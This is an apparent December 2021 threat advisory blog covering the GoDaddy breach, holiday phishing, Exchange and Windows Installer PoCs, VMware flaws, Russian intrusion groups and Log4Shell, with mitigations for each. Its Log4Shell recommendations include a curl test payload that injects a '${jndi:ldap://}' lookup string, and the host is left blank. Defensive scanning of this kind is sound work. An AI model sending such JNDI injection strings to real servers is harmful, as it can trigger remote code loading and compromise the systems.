Threat advisories

Top Middle East Cyber Threats – 13 December 2021

Dec-2021 10 min to read

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

GoDaddy Data Breach Impacts 1.2 Million WordPress Site Owners

On November 22, Internet infrastructure company GoDaddy said that a hacker gained access to the personal information of more than 1.2 million customers of its WordPress hosting service.

The subsequent investigation found that a hacker had access to its servers for more than two months, since at least September 6.

Based on current evidence, GoDaddy said the hacker gained access to the following information:

The email addresses and numbers of up to 1.2 million active and inactive Managed WordPress customers.
The original WordPress Admin password that GoDaddy issued to customers when a site was created.
The sFTP and database usernames and passwords for active customers.
The SSL private key for a subset of active customers.

GoDaddy said it already reset sFTP and database passwords exposed in the hack. It also reset the admin account password for customers who were still using the default one that GoDaddy issued when their sites were created.

RECOMMENDATIONS

If you are using WP hosting service from GoDaddy, ensure resetting all passwords related to your accounts, SFTP, databases and control panels.
Ensure changing other personal and corporate account passwords in case of using shared passwords.
Monitor abnormal access such as out of working hours or outside the country.
Investigate any suspicious changes such as SSL certificate, website source code modifications or unknown files presence.
Initiate DFIR to detect any possible unauthorized access or malicious activities.

Public Holidays Expected to Witness Surge in Phishing and Scams

Multiple phishing cases targeting customers in the Financial and Retail sectors have been reported to Help AG recently.

Cybercriminals tend to use big events as a lure and since public holidays provide opportunities for collecting financial information and establishing heavy engagement, they gain momentum for online phishing and scams. As a result, it is expected that similar to previous years, the trend of surge in phishing and scams continues.

Expected increase is in the following categories:

Credential phishing
Malware (especially trojans capable of harvesting credentials, downloading and executing other malware)
Phishing for banking details
Phishing for e-payment details
Phishing impersonating e-commerce websites

RECOMMENDATIONS

Perform user awareness campaigns.
Have a hotline and email address for users to report suspicious encounters regarding their credentials or organizational assets. Users need to be informed about the ability and importance of reporting such encounters.

Windows Zero Day PoCs Disclosed Publicly

Researches published PoCs in GitHub for two vulnerabilities, one of them is still not patched.

The first PoC exploits CVE-2021-42321 and impacts on-premises Exchange Server 2016 and Exchange Server 2019 (including those used by customers in Exchange Hybrid mode).

Successful exploitation allows authenticated attackers to execute code remotely on vulnerable Exchange servers.

CVE-2021-42321 was already fixed in Microsoft November patch.

The Second PoC exploits CVE-2021-41379 thatexists within the Windows Installer service. An attacker can abuse the service to delete a file or directory and to escalate privileges and execute arbitrary code in the context of SYSTEM.

This vulnerability wasn’t fixed correctly and a new zero-day privilege elevation vulnerability was found after examining Microsoft’s fix.

Researchers have publicly disclosed the PoC that gives SYSTEM privileges in Windows 10, Windows 11, and Windows Server.

RECOMMENDATIONS

Install November patches and keep systems up to date.
For CVE-2021-41379, Please keep tracking Microsoft’s next patches to install them and fix this vulnerability immediately. CVE-2021-41379 PoC binary can be detected if downloaded and used directly by adding following hashed to your monitoring list (MD5: f317b6bafb5c6f4c3c9ffb967fd941b5 SHA256: 9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd).
Restrict endpoint access to legitimate cloud services like Google Drive, OneDrive, Dropbox, GitHub, GitLab, Pastebin.
Enable software restriction policies and application whitelisting.

VMware vCenter Server Updates Address Two Vulnerabilities

VMware issued an advisory to address two vulnerabilities in VMware vCenter Server (vCenter Server) and VMware Cloud Foundation (Cloud Foundation).

The first vulnerability is described as arbitrary file read vulnerability in the vSphere Web Client (CVE-2021-21980) and has CVSSv3 base score of 7.5.

A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information.

The second vulnerability tracked as CVE-2021-22049 with CVSSv3 base score of 6.5, the vSphere Web Client (FLEX/Flash), contains an SSRF (Server Side Request Forgery) vulnerability in the vSAN Web Client (vSAN UI) plug-in.

A malicious actor with network access to port 443 on vCenter Server may exploit this issue by accessing a URL request outside of vCenter Server or accessing an internal service.

VMware released updates to remediate both vulnerabilities.

RECOMMENDATIONS

Install the patches and keep systems up to date.

Russian Threat Actors Targeting Government Entities Globally

Researchers continue to monitor multiple groups of alleged Russian intrusion activity that have targeted businesses and governments worldwide. According to a recent assessment, these activities are divided into two distinct clusters, UNC3004 and UNC2652. UNC2452, also known as Nobelium by Microsoft, is associated with both groups.

Since 2020, one of the most common tactics has been the compromise of multiple technology solutions, services, and reseller companies. Threat actors also used credentials obtained from a third-party actor’s info-stealer malware campaign to gain early access to organizations. According to the report highlighting Q1 2021, accounts with Application Impersonation privileges have been used to harvest sensitive mail data. Other tactics include the use of both residential IP proxy services and newly provisioned geolocated infrastructure to interact with affected victims, the use of novel TTPs to circumvent security restrictions within environments, such as the extraction of virtual machines to determine internal routing configurations, the use of a new tailor-made downloader researchers call CEELOADER, and the abuse of multi-factor authentication via “push” notifications on smartphones.

In the majority of cases, post-compromise activity included data theft relevant to Russian interests. In some cases, it appears that data theft was conducted primarily to create new routes to other victim environments.

RECOMMENDATIONS

Make efforts to increase visibility through endpoint detection, response, and logging. Endpoint monitoring tools are critical for detecting suspicious activity in an environment after other controls have been circumvented.

Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
Ensure that systems are correctly configured and that the security features are enabled.
Develop risk management and cyber hygiene practices for third parties or managed service providers (MSPs) that your organization relies on.
Use Multi-Factor Authentication (MFA) for all services, especially webmail, virtual private networks, and accounts that access critical systems, to the extent possible.
Block the indicators of compromise within respective security controls organization wide.

Critical Vulnerability (aka Log4Shell) Affecting Apache Log4j2

Log4j2 is a Java-based open-source logging framework that is commonly used in Apache web servers. A critical vulnerability CVE-2021-44228 (CVSS score:10/10) affecting the Log4j2 utility was reported, prompting the vendor to release several fixes and code revisions. The Log4j2 library is used in a variety of Apache framework services, and an active exploitation has been discovered in the wild as of today. This critical vulnerability, later identified as CVE-2021-44228 (also known as “Log4Shell”), affects all Log4j2 versions from 2.0-beta9 to 2.14.1.

Efforts to address CVE-2021-44228 led to at least two releases containing fixes. According to industry sources, these fixes were insufficient because the initial release candidate (Log4j2 2.15.0-rc1) addressing the vulnerability could be bypassed to achieve RCE. Version Log4j2 2.15.0-rc2 is recommended for use as of December 10, 2021. Some reports indicate that the exploit seemed to be trivial, as well as internal and external data sources indicating a massive increase in traffic, exhibiting scanning/exploitation attempts targeting the JNDI and LDAP services.

JNDI8, which provides an abstract interface for various name resolution and directory services such as DNS or LDAP, is used to exploit the vulnerability.

Log4j2 does not sufficiently sanitize user-supplied data, presumably allowing the attacker to provide a string that is interpreted as a variable, resulting in the loading and invocation of a remote Java class file when expanded. The use of Log4j2 by a specific service determines whether it is exploitable. The JNDI/LDAP URL serves a malicious Java class object that will be deserialized and invoked on the victim host to compromise the target. Because JNDI does not impose any security controls on LDAP requests, this action is permissible. Furthermore, unlike other JNDI protocols, LDAP allows classes to be loaded from remote resources. Publicly available tools for creating appropriate exploit payloads, such as marshalsec, are available.

According to a blog post, the LDAP attack vector is unaffected by JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1. JNDI cannot load remote code using LDAP in these versions because com.sun.jndi.ldap.object.trustURLCodebase is set to false. This critical vulnerability in Apache Log4j has impacted some popular implementations, such as VMware & Oracle products.

Mitigation steps:

Upgrade log4j to the latest version.
For log4j versions 2.10-2.14 the flag “log4j2.formatMsgNoLookups” can be set to “true” to disable the vulnerable functionality.
For log4j versions 2.7+ you can change the pattern layout to disable lookups by outputting the message as “%m{nolookups}” (instead of for example %msg% or %m in your logpattern)
Many modern applications use logback as logging backend instead of log4j (even if the log4j-api is used). In those cases, the vulnerable log4j-core library is not used.

RECOMMENDATIONS

Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
Ensure that systems are correctly configured and that the security features are enabled.
To receive security fixes, users should upgrade to Log4j 2 as Log4j 1.x is no longer supported and has reached the end of its life cycle. Vulnerabilities in Log4j 1.x that were reported after August 2015 were not checked and will not be fixed.
The configuration, log messages, and parameters of Apache Log4j2=2.14.1 do not protect against attacker-controlled LDAP and other JNDI-related endpoints. When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can run arbitrary code loaded from LDAP servers. Use log4j beginning with version 2.15.0, as the Apache team has disabled this behavior by default to avoid the problem.
Evaluate different installation methods; the location of the matching JAR file could also indicate which application is potentially vulnerable. On Windows, for example, if the file is in C:Program FilesApplicationNamelog4j-core-version.jar, it denotes that Application Name must be investigated. The lsof utility on Linux can show which processes are currently using the JAR file and can be run with the following syntax: “lsof /path/to/log4j-core-version.jar;”
Limit outbound connections from affected servers to trusted hosts and protocols to prevent the vulnerable Java service from downloading a malicious class file via LDAP.
Review official VMware (VMSA-2021-00280) and Oracle notifications and deploy necessary patches as soon as possible.
Patch log4j or disable the format message lookup if running a vulnerable version.
Initiate VAPT scant to verify vulnerable systems. PoC will be something like: curl -H ‘X-Api-Version: ${jndi:ldap://}’
Isolate third-party applications running the vulnerable versions.